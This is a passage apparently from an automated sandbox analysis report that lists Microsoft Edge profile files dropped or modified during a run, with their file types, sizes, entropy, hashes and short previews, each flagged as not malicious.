                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343559442531603","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343559443198826","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343559451800699","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                Entropy (8bit):1.2802394859211257
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBobB:uIEumQv8m1ccnvS6Csmdkii2mz1a
                                                                                                                                                                                                                                                                MD5:E920FD56239A3EEDF24BB84B6F4B2E43
                                                                                                                                                                                                                                                                SHA1:A11684880DD140E88CA611D3E5B66B7A281E4672
                                                                                                                                                                                                                                                                SHA-256:BD8CE70EE243D239FC529FA73CC41A802ED26DC97F7A4B88A3D6604D378CC6BA
                                                                                                                                                                                                                                                                SHA-512:16B2E6A59BE8C46ADA88EF129870C286A454AEC7B435923047C0D6307E818A677BE2DDD8AD16C27B1AFAACB6C4E4A4A8AC8855E120B7C17246AB94F979C718C2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF35a17.TMP (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3735c.TMP (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ccc6afbc-d5a3-4c9a-8f46-2ebf5771dde8.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9499
                                                                                                                                                                                                                                                                Entropy (8bit):5.11305086439715
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:st5kdpCs4ZIa34Hk+8EX8tbV+FW3QA4Jq7NIOPNYJ:st5QCs4ZX1/bGCQx07NIl
                                                                                                                                                                                                                                                                MD5:FF8C0A97C32B79A36C19405A7777981B
                                                                                                                                                                                                                                                                SHA1:8E5804FA0600F6656891B1AC73F25615620C884F
                                                                                                                                                                                                                                                                SHA-256:3DC64149203FE087B93E2BBA60672C47DA216D88FB9C39F361A2960E63581D06
                                                                                                                                                                                                                                                                SHA-512:52DF329A16692596ED9B66DE1917B60BCD3956328B3FC022AAEF54452445041D2CDF1C1D2084CB2CC2AD16F0DEFC016CB7AC48413F3BBD77690E57ED834AE005
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378826830031057","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3a077.TMP (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9499
                                                                                                                                                                                                                                                                Entropy (8bit):5.11305086439715
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:st5kdpCs4ZIa34Hk+8EX8tbV+FW3QA4Jq7NIOPNYJ:st5QCs4ZX1/bGCQx07NIl
                                                                                                                                                                                                                                                                MD5:FF8C0A97C32B79A36C19405A7777981B
                                                                                                                                                                                                                                                                SHA1:8E5804FA0600F6656891B1AC73F25615620C884F
                                                                                                                                                                                                                                                                SHA-256:3DC64149203FE087B93E2BBA60672C47DA216D88FB9C39F361A2960E63581D06
                                                                                                                                                                                                                                                                SHA-512:52DF329A16692596ED9B66DE1917B60BCD3956328B3FC022AAEF54452445041D2CDF1C1D2084CB2CC2AD16F0DEFC016CB7AC48413F3BBD77690E57ED834AE005
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378826830031057","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3c98b.TMP (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9499
                                                                                                                                                                                                                                                                Entropy (8bit):5.11305086439715
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:st5kdpCs4ZIa34Hk+8EX8tbV+FW3QA4Jq7NIOPNYJ:st5QCs4ZX1/bGCQx07NIl
                                                                                                                                                                                                                                                                MD5:FF8C0A97C32B79A36C19405A7777981B
                                                                                                                                                                                                                                                                SHA1:8E5804FA0600F6656891B1AC73F25615620C884F
                                                                                                                                                                                                                                                                SHA-256:3DC64149203FE087B93E2BBA60672C47DA216D88FB9C39F361A2960E63581D06
                                                                                                                                                                                                                                                                SHA-512:52DF329A16692596ED9B66DE1917B60BCD3956328B3FC022AAEF54452445041D2CDF1C1D2084CB2CC2AD16F0DEFC016CB7AC48413F3BBD77690E57ED834AE005
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378826830031057","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3fd4d.TMP (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9499
                                                                                                                                                                                                                                                                Entropy (8bit):5.11305086439715
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:st5kdpCs4ZIa34Hk+8EX8tbV+FW3QA4Jq7NIOPNYJ:st5QCs4ZX1/bGCQx07NIl
                                                                                                                                                                                                                                                                MD5:FF8C0A97C32B79A36C19405A7777981B
                                                                                                                                                                                                                                                                SHA1:8E5804FA0600F6656891B1AC73F25615620C884F
                                                                                                                                                                                                                                                                SHA-256:3DC64149203FE087B93E2BBA60672C47DA216D88FB9C39F361A2960E63581D06
                                                                                                                                                                                                                                                                SHA-512:52DF329A16692596ED9B66DE1917B60BCD3956328B3FC022AAEF54452445041D2CDF1C1D2084CB2CC2AD16F0DEFC016CB7AC48413F3BBD77690E57ED834AE005
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378826830031057","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):25012
                                                                                                                                                                                                                                                                Entropy (8bit):5.567227888340905
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:llvMcqWPwufTS8F1+UoAYDCx9Tuqh0VfUC9xbog/OVWDULIrwgpXtun:llvMcqWPwufTSu1jaP4LZgtE
                                                                                                                                                                                                                                                                MD5:9ED3060A9F39B28EF4CB707645732673
                                                                                                                                                                                                                                                                SHA1:48B40BE9DCB688E3BB3E8BA0945C9268A8231672
                                                                                                                                                                                                                                                                SHA-256:78237730668568C717C167CD7A6ED23E050EBDC52C5A3304CE7FBF6C529D39A6
                                                                                                                                                                                                                                                                SHA-512:B193E592E0F6800008F6545C44CC15A59DAE5818FCD4C7B260B92DB3BA69A924B7CA081D86EFF88BB87E2CD22E228CDA5090B04C6241D1E0D7CEA0FAA4CD9F17
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378826829511448","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378826829511448","location":5,"ma

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF39a6c.TMP (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):25012
                                                                                                                                                                                                                                                                Entropy (8bit):5.567227888340905
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:llvMcqWPwufTS8F1+UoAYDCx9Tuqh0VfUC9xbog/OVWDULIrwgpXtun:llvMcqWPwufTSu1jaP4LZgtE
                                                                                                                                                                                                                                                                MD5:9ED3060A9F39B28EF4CB707645732673
                                                                                                                                                                                                                                                                SHA1:48B40BE9DCB688E3BB3E8BA0945C9268A8231672
                                                                                                                                                                                                                                                                SHA-256:78237730668568C717C167CD7A6ED23E050EBDC52C5A3304CE7FBF6C529D39A6
                                                                                                                                                                                                                                                                SHA-512:B193E592E0F6800008F6545C44CC15A59DAE5818FCD4C7B260B92DB3BA69A924B7CA081D86EFF88BB87E2CD22E228CDA5090B04C6241D1E0D7CEA0FAA4CD9F17
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378826829511448","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378826829511448","location":5,"ma

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):80
                                                                                                                                                                                                                                                                Entropy (8bit):4.323098996850684
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:chltUQ2Hm4kxH4xRNwBgzNnNurkXn:chXUQI2xH8BzNmen
                                                                                                                                                                                                                                                                MD5:8DA62954B0B14642CF287A260418E39B
                                                                                                                                                                                                                                                                SHA1:E82BF98669AE1D73BBD9294D9F454044D5C2622E
                                                                                                                                                                                                                                                                SHA-256:B7E25784D1B3A3653C618822715DAE7CC86BF0B05FFF0CF3C5D6A1FB169F0614
                                                                                                                                                                                                                                                                SHA-512:E44DC92CAA0579A81CBF176A589493421AAD851D7006603B54684EE8CBFC67F572F2B0219F4483227F3FF9CC614D882B2ADB8060873E358C7D6870CAF9E3865C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):299
                                                                                                                                                                                                                                                                Entropy (8bit):5.158500114350316
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7AAV1CHhJ23oH+TcwtE/a252KLlpAAU3+q2PCHhJ23oH+TcwtE/a2ZIFUv:7BYeb8xLTE3+vBYeb8J2FUv
                                                                                                                                                                                                                                                                MD5:E768D6A7A7F2BA9616339B6EC4CF3F41
                                                                                                                                                                                                                                                                SHA1:ED3574891D309CC47AE6AB03C89729B42086EEF7
                                                                                                                                                                                                                                                                SHA-256:84271E16E4914F88BEC09A03AA80E1408A8F468EE7D1EAC9BA1E3DCCD8CA47E2
                                                                                                                                                                                                                                                                SHA-512:FBFC2E0AA13AE631C5625E0C47073223F5C96730F52110F137890DBB5AEF4302FBEF48891568A58EBA479004342F5CB61CFD3C128C8588B0CC64779591C61C90
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:27.646 144c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/16-07:47:27.661 144c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
